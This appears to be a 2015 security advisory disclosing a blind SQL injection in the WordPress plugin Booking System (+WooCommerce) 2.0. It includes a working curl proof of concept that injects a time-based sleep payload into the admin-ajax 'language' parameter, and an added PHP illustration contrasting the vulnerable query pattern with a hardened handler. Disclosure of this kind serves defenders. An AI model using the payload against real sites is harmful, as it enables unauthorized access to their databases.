Subject: Blind SQL injection in Booking System (+WooCommerce) 2.0
Date: Tue, 7 Jul 2015 11:27:13 +0200

Hello,

Plugin: Booking System (+WooCommerce) 2.0

Remote authenticated users (subscriber, editor, etc.) can execute arbitrary SQL commands (and there is no CSRF protection).

1. SQL injection (DOPBSPBackEndTranslation::display())

Method: POST
URL: http://localhost/wp-admin/admin-ajax.php
Parameter: language


Example PHP callstack:
  DOPBSPBackEndTranslation::display   [/booking-system/includes/translation/class-backend-translation.php:43]
  wpdb::get_results  

Verification: 

curl --cookie "..." --request POST --data "action=dopbsp_translation_display&language=en t1 where id=(select sleep(10))-- -&text_group=all" http://localhost/wp-admin/admin-ajax.php
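The following is an added illustration (not the plugin's code) of the vulnerable pattern next to a hardened admin-ajax handler that adds a nonce check, a capability check and input validation. The unquoted payload above (`en t1 where ...`) suggests the parameter lands in an identifier position such as a table name, which `$wpdb->prepare()` cannot bind, so the fix allowlists it; the function, hook, nonce and table names are assumptions.

```php
<?php
// Hypothetical admin-ajax handler: NOT the plugin's code. Function, hook,
// nonce and table names are placeholders chosen for this illustration.

// --- Vulnerable pattern: request input concatenated into the query ---
function example_translation_display_vulnerable() {
    global $wpdb;
    $language = $_POST['language'];            // attacker-controlled
    // Placeholder table name; the real one is not given in the advisory.
    $sql = "SELECT * FROM {$wpdb->prefix}example_translation_{$language}";
    return $wpdb->get_results( $sql );         // no nonce, no capability, no validation
}

// --- Hardened version ---
function example_translation_display_secure() {
    global $wpdb;

    // CSRF: require the nonce the admin page embeds for this action.
    check_ajax_referer( 'example_translation_nonce', 'nonce' );

    // Authorization: low-privilege roles should not reach plugin admin data.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // The language selects a table (an identifier), which prepare() cannot bind,
    // so restrict it to a fixed allowlist instead of escaping it.
    $allowed_languages = array( 'en', 'de', 'fr' );   // constructed list
    $language = isset( $_POST['language'] ) ? sanitize_key( wp_unslash( $_POST['language'] ) ) : '';
    if ( ! in_array( $language, $allowed_languages, true ) ) {
        wp_send_json_error( 'invalid language', 400 );
    }
    $table = $wpdb->prefix . 'example_translation_' . $language;

    // Data values, by contrast, are bound with prepare().
    $group = isset( $_POST['text_group'] ) ? sanitize_text_field( wp_unslash( $_POST['text_group'] ) ) : 'all';
    if ( 'all' === $group ) {
        $rows = $wpdb->get_results( "SELECT * FROM `{$table}`" );
    } else {
        $rows = $wpdb->get_results(
            $wpdb->prepare( "SELECT * FROM `{$table}` WHERE text_group = %s", $group )
        );
    }
    wp_send_json_success( $rows );
}

add_action( 'wp_ajax_example_translation_display', 'example_translation_display_secure' );
```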


--
Regards,
Marcin Probola,
https://wordpress.org/plugins/booking-system/